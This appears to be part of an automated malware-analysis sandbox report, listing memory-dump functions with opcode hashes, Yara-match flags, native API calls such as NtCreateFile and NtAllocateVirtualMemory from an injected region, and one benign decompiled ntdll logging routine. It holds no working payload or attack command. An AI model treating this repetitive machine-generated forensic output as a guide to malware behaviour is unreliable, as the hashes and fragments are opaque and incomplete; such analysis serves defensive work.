                                                                      • Instruction ID: 179b8fa068fecaa16570e5470a44cbf31f4064036d8fc7609e199faf22e18c2b
                                                                      • Opcode Fuzzy Hash: 6cebe508352f79f16f739d50613c96c7d9c418767307631d4b99b4cc96c99d0c
                                                                      • Instruction Fuzzy Hash: 7190027530100C02D504619A48046860009A7D0345F51C021A6414655EDAA588957171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbf530dd3fb2f2e78ce9e268b64b0ff2c925b637b85f7405e0d833e96db31f82
                                                                      • Instruction ID: 89463a5b104e67a29754aeff339f4b4819f21f9deba70552753c3a1b2e7c7251
                                                                      • Opcode Fuzzy Hash: dbf530dd3fb2f2e78ce9e268b64b0ff2c925b637b85f7405e0d833e96db31f82
                                                                      • Instruction Fuzzy Hash: 3B9002A531100442D504619A44047060049A7E1245F51C022A2544554CC9698C656165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f04b041947d81beead58db867d0d14453642d832fef0335c460399b38b8f789f
                                                                      • Instruction ID: 80a123e99b1726321dca8e8af28e777b9194ee3fe6f3c24719f39c415cb10cdf
                                                                      • Opcode Fuzzy Hash: f04b041947d81beead58db867d0d14453642d832fef0335c460399b38b8f789f
                                                                      • Instruction Fuzzy Hash: 8F90027534100802D541719A4404606000DB7D0285F91C022A0814554ECA958A5ABAA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f22385cb9a785efc3e30c765e7afd43515b6cdf1724e25abd6ccd3829c88716
                                                                      • Instruction ID: 75bb019aec29c8f6af1d7441ee321fdd4b3400174a36804f369e18eeb3a71ccc
                                                                      • Opcode Fuzzy Hash: 5f22385cb9a785efc3e30c765e7afd43515b6cdf1724e25abd6ccd3829c88716
                                                                      • Instruction Fuzzy Hash: B99002A5701144438940B19A48044065019B7E1345391C131A0844560CCAA88859A2A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6283119ad0c6e9d03c2942623359e7e546be673b3fceb52c41ccd61685ed55aa
                                                                      • Instruction ID: 5c600d1bd1572d1d521d04010b98cefedd8de97de9c2071f08f47c424daf9b5d
                                                                      • Opcode Fuzzy Hash: 6283119ad0c6e9d03c2942623359e7e546be673b3fceb52c41ccd61685ed55aa
                                                                      • Instruction Fuzzy Hash: F290026530100802D502619A4414606000DE7D1389F91C022E1814555DCA658957B172
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fa3355fc12cb7ecf04494441fc07b4fd21387bea2deff178f9f569409b7ae180
                                                                      • Instruction ID: e4892e1fb46b8ff357a0c229152931295c32b46bdcb5901089227dea38d2f0c3
                                                                      • Opcode Fuzzy Hash: fa3355fc12cb7ecf04494441fc07b4fd21387bea2deff178f9f569409b7ae180
                                                                      • Instruction Fuzzy Hash: 6990026570500802D540719A54187060019A7D0245F51D021A0414554DCA998A5976E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6d31c2689c7b0ad4942481913ae7666ee5be46f660ae3eecb89dde56701c9735
                                                                      • Instruction ID: 4fada98ec4c42f5cd10159e90660fa8cfe115acc8be12d58b7d353407f089b9b
                                                                      • Opcode Fuzzy Hash: 6d31c2689c7b0ad4942481913ae7666ee5be46f660ae3eecb89dde56701c9735
                                                                      • Instruction Fuzzy Hash: 4E90027530100452D900A6DA5804A4A4109A7F0345B51D025A4404554CC99488656161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 041cf8db22018173b9d9f728d835f511778663202bec12948b5b92b584c0886d
                                                                      • Instruction ID: f54c36ab51e3b95df2cf3a38a55db4cdc426f012eee68617754f11e22f9e0155
                                                                      • Opcode Fuzzy Hash: 041cf8db22018173b9d9f728d835f511778663202bec12948b5b92b584c0886d
                                                                      • Instruction Fuzzy Hash: D690026534100C02D540719A8414707000AE7D0645F51C021A0414554DCA56896976F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b00a12e5a7349fcf5c0bc46c15d59af1eac8198accd15ea3b8c55a319c9b69ca
                                                                      • Instruction ID: e8db8b543c810173ffd051d58d38ae1d80b6eba409bb4f69aa89bbc23fccb0e6
                                                                      • Opcode Fuzzy Hash: b00a12e5a7349fcf5c0bc46c15d59af1eac8198accd15ea3b8c55a319c9b69ca
                                                                      • Instruction Fuzzy Hash: E290026530504842D500659A5408A060009A7D0249F51D021A1454595DCA758855B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94cea3d638beee5c96b2587b9a0141d0ffc5dbd89f9eede26d37e0e7f27269a6
                                                                      • Instruction ID: 62ace45bb005d135f760e89a48864ba1f5b4dd0ba9d46dbe6b5697a94e3b7a9d
                                                                      • Opcode Fuzzy Hash: 94cea3d638beee5c96b2587b9a0141d0ffc5dbd89f9eede26d37e0e7f27269a6
                                                                      • Instruction Fuzzy Hash: C790027930504842D900659A5804A870009A7D0349F51D421A081459CDCA948865B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23b120a627963c10ee0f899ed86b8bd4d6b76e29d22f35ffbd47ac3a9a362313
                                                                      • Instruction ID: feeff64f8c66cce559b676e868a36cda7afe4463c2235dacb07b5c355c9393d9
                                                                      • Opcode Fuzzy Hash: 23b120a627963c10ee0f899ed86b8bd4d6b76e29d22f35ffbd47ac3a9a362313
                                                                      • Instruction Fuzzy Hash: A990027530100803D500619A55087070009A7D0245F51D421A0814558DDA9688557161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3808abfe207ea31f8ee21b171a072689c02ab4aad18f448d8c59df5a496c3b17
                                                                      • Instruction ID: 0c96a9098cf52db9eee40a15f57205247f52adc942ca0e18f66dfb730df07ae6
                                                                      • Opcode Fuzzy Hash: 3808abfe207ea31f8ee21b171a072689c02ab4aad18f448d8c59df5a496c3b17
                                                                      • Instruction Fuzzy Hash: 6E90027530144402D540719A844460B5009B7E0345F51C421E0815554CCA55885AA261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 688590d4529436e706c7eca6224eb6545ef0fffeb6340cfba3b661cdf18225e8
                                                                      • Instruction ID: 0bb05899f4259a56e557a8790f1587c7a11dd9475628e59efc2a4d2044e946a5
                                                                      • Opcode Fuzzy Hash: 688590d4529436e706c7eca6224eb6545ef0fffeb6340cfba3b661cdf18225e8
                                                                      • Instruction Fuzzy Hash: 2D90027570500C02D550719A44147460009A7D0345F51C021A0414654DCB958A5976E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c7b671cc0ac55cbf4244875ce5041bb34cd4946e3e782542c0b8a23f20f9ea0
                                                                      • Instruction ID: 8beffa376f6632a3c104151e8713a75414470dcd665c06c942df39780b742856
                                                                      • Opcode Fuzzy Hash: 1c7b671cc0ac55cbf4244875ce5041bb34cd4946e3e782542c0b8a23f20f9ea0
                                                                      • Instruction Fuzzy Hash: 2A90027530140802D500619A48087470009A7D0346F51C021A5554555ECAA5C8957571
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae7e701b977160690d7ec2c3888025da642c04868f51f1293c84923736829d3c
                                                                      • Instruction ID: 6e3197426d93c277b11fcb6cad5ddf4720357bfe3a699776b04b5efe33dd981c
                                                                      • Opcode Fuzzy Hash: ae7e701b977160690d7ec2c3888025da642c04868f51f1293c84923736829d3c
                                                                      • Instruction Fuzzy Hash: 7B90027530504C42D540719A4404A460019A7D0349F51C021A0454694DDA658D59B6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0958ce03d2d502b678ed8a7cef163a9154a87b5121cbc42553fdeae8e465980a
                                                                      • Instruction ID: 59d237f0c562353fe11f6f3328c609fd4c81f17c486ea9abde86b1826893e6c9
                                                                      • Opcode Fuzzy Hash: 0958ce03d2d502b678ed8a7cef163a9154a87b5121cbc42553fdeae8e465980a
                                                                      • Instruction Fuzzy Hash: FB90026530144842D540629A4804B0F4109A7E1246F91C029A4546554CCD5588596761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 04d4ec12338942e5311d92c0c27e380356b2cd0407a12465bd666102aefe7839
                                                                      • Instruction ID: 774079c532aa4c0c092856b9ec9806525aece00d231e4e6fe02a97b0b37b633d
                                                                      • Opcode Fuzzy Hash: 04d4ec12338942e5311d92c0c27e380356b2cd0407a12465bd666102aefe7839
                                                                      • Instruction Fuzzy Hash: 9290027530100C42D500619A4404B460009A7E0345F51C026A0514654DCA55C8557561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: ff44a9dd03741a4eb9785cfc46d398004565a3323bbb8ed5da006283d8381724
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E013AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E0135CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E013A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E013A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}










                                                                      0x013afdda
                                                                      0x013afde2
                                                                      0x013afde5
                                                                      0x013afdec
                                                                      0x013afdfa
                                                                      0x013afdff
                                                                      0x013afe0a
                                                                      0x013afe0f
                                                                      0x013afe17
                                                                      0x013afe1e
                                                                      0x013afe19
                                                                      0x013afe19
                                                                      0x013afe19
                                                                      0x013afe20
                                                                      0x013afe21
                                                                      0x013afe22
                                                                      0x013afe25
                                                                      0x013afe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013AFDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013AFE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013AFE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: edaa25c1466bc6a7f26488a64d77061cd470b278b53a279065c6705a33a4b2aa
                                                                      • Instruction ID: ec4cdce6aad364bc7af4b7b69caa109c38a1cbca6e7bbbbe9efcd943a2bd85f2
                                                                      • Opcode Fuzzy Hash: edaa25c1466bc6a7f26488a64d77061cd470b278b53a279065c6705a33a4b2aa
                                                                      • Instruction Fuzzy Hash: 48F0F632200601BFEA251A49DC06F37BF5EEB44B34F240315F728565D1EA62F82097F4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02FA3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FA3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02FA861D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 75a2258dc9f01862bb2d9d79663caefeda387dddd2dfcec0b0ef34b8951b9bd8
                                                                      • Instruction ID: e8b70a408e63f54fa72738d13b4f86d8ce10cd305ebeab23cddeb58ee088e7c6
                                                                      • Opcode Fuzzy Hash: 75a2258dc9f01862bb2d9d79663caefeda387dddd2dfcec0b0ef34b8951b9bd8
                                                                      • Instruction Fuzzy Hash: DD01A8B2201108ABCB08CF98DC94DEB37A9AF8C754F158648FA1997280C630E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02FA3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FA3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02FA861D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction ID: 15aa4bcb72ba7aba5d1c64d83f28c70071d6f0f2f7bafa4ef1466838ea766c71
                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction Fuzzy Hash: 06F0BDB2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(02FA3D62,5E972F65,FFFFFFFF,02FA3A21,?,?,02FA3D62,?,02FA3A21,FFFFFFFF,5E972F65,02FA3D62,?,00000000), ref: 02FA86C5
                                                                      • NtClose.NTDLL(02FA3D40,?,?,02FA3D40,00000000,FFFFFFFF), ref: 02FA8725
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFileRead
                                                                      • String ID:
                                                                      • API String ID: 752142053-0
                                                                      • Opcode ID: 1fe1f2aa58380e26ab21ed7810cd8b9037f567793dd091385844ff24f703d926
                                                                      • Instruction ID: 4082b79d33cf8af386a87dcefc469386fe658d1dd2b23487f2c2061fa207dcb8
                                                                      • Opcode Fuzzy Hash: 1fe1f2aa58380e26ab21ed7810cd8b9037f567793dd091385844ff24f703d926
                                                                      • Instruction Fuzzy Hash: 7501E4B6200108ABDB14DF99DC80DEB77ADEF8C794F158259FE1CA7241C670E9118BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(02FA3D62,5E972F65,FFFFFFFF,02FA3A21,?,?,02FA3D62,?,02FA3A21,FFFFFFFF,5E972F65,02FA3D62,?,00000000), ref: 02FA86C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction ID: 8a7e0b5394d5850a54400337c3250fa13a58534f4a1267dfd8d4fe5fb3338f3a
                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction Fuzzy Hash: 9AF0B7B2200208AFDB18DF89DC94EEB77ADEF8C754F158258BE1D97241D630E811CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(02FA3D62,5E972F65,FFFFFFFF,02FA3A21,?,?,02FA3D62,?,02FA3A21,FFFFFFFF,5E972F65,02FA3D62,?,00000000), ref: 02FA86C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 4855f6c545c6ee2abb5d30d1d68411e40293e545b554ceb51cb86db844b3a48a
                                                                      • Instruction ID: b7cb89fdb5dfb5ab1b3bf187e2f7b1b385ddec521076f67aabfe94ac2ff85cbd
                                                                      • Opcode Fuzzy Hash: 4855f6c545c6ee2abb5d30d1d68411e40293e545b554ceb51cb86db844b3a48a
                                                                      • Instruction Fuzzy Hash: 6FF01DB6110049ABCB04DF98DC94CEB77ADFF8C354B158649BD5D93201C534E8558BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F92D11,00002000,00003000,00000004), ref: 02FA87E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                      • Instruction ID: 077aa9fdf8fea7666d31e97e4815c586238fe3192949a6dd08960feafcfe2d51
                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                      • Instruction Fuzzy Hash: 4FF015B2200208ABDB18DF89CC80EAB77ADAF88750F118158BE0897241C630F810CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(02FA3D40,?,?,02FA3D40,00000000,FFFFFFFF), ref: 02FA8725
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction ID: 1b816c18120e699c51d1e370a6d612c9f168627e588ba9abb03e94ed7239399e
                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction Fuzzy Hash: 0DD012752002146BD714EB98CC45E97775DEF44750F154455BA185B241C570F50086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b710916ebe6e87bd3c49d1d200aa4c5e99d8bf447563bb0221c62b3883bb92a4
                                                                      • Instruction ID: 5151e07d0e1902084612d9a8ccca9051d7e9f798c4c8a2473f52b0dc1bcede1a
                                                                      • Opcode Fuzzy Hash: b710916ebe6e87bd3c49d1d200aa4c5e99d8bf447563bb0221c62b3883bb92a4
                                                                      • Instruction Fuzzy Hash: 8490027130140413F51171598905F07000D97E0285F91D456E049555CD9696D952B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7f01d6871ea29d50d06bbb3d9e422cdbb8c892c9afe531dc5844ad9aed7d4883
                                                                      • Instruction ID: 315d84c89a9458ee2e5475ccca7e9938f6087deabe3bc097a60624e4020a011f
                                                                      • Opcode Fuzzy Hash: 7f01d6871ea29d50d06bbb3d9e422cdbb8c892c9afe531dc5844ad9aed7d4883
                                                                      • Instruction Fuzzy Hash: 39900261342441527945B1598805D07400AA7F0285791D056E1485954C8566E856E661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8ec7e5e7ac2df339743a1158c293ec3e20976ab88e488ddcafa8230d839a0ef6
                                                                      • Instruction ID: 6da7a9ff154a29a0819a6b695e4f2c9adb94283a60d67083c0c390bdfec761f4
                                                                      • Opcode Fuzzy Hash: 8ec7e5e7ac2df339743a1158c293ec3e20976ab88e488ddcafa8230d839a0ef6
                                                                      • Instruction Fuzzy Hash: C69002A130240003650571598815E16400E97F0245B51D065E1085594DC565D8917165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 091d7b6f662d9720a38a4586e6e0f7b8aa467754fbc6a12715cb9fcfbd677a31
                                                                      • Instruction ID: 8f54fa8a2dea615830de2d77e05999e820a54415462de270b812d4c9225012f4
                                                                      • Opcode Fuzzy Hash: 091d7b6f662d9720a38a4586e6e0f7b8aa467754fbc6a12715cb9fcfbd677a31
                                                                      • Instruction Fuzzy Hash: F39002A134140442F50071598815F060009D7F1345F51D059E10D5558D8659DC527166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d4755a2146d160feb909b5da6bbd2d2518ea0df3a28815356873ab63b3b204ae
                                                                      • Instruction ID: cb34ed6c5798222a19a0ba2c598ced61b97e62f1cb5218b77eb84ab9ef92ab4c
                                                                      • Opcode Fuzzy Hash: d4755a2146d160feb909b5da6bbd2d2518ea0df3a28815356873ab63b3b204ae
                                                                      • Instruction Fuzzy Hash: 71900265311400032505B5594B05D07004A97E5395351D065F1086554CD661D8616161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 825c1b1b4482d13002c081d9be0221e92f8c008e92c479d63903677dd0f1b39b
                                                                      • Instruction ID: 37b035cc3eb4bff61f812d16b166289f3eb921b21a8bd5e7614867adc55a4618
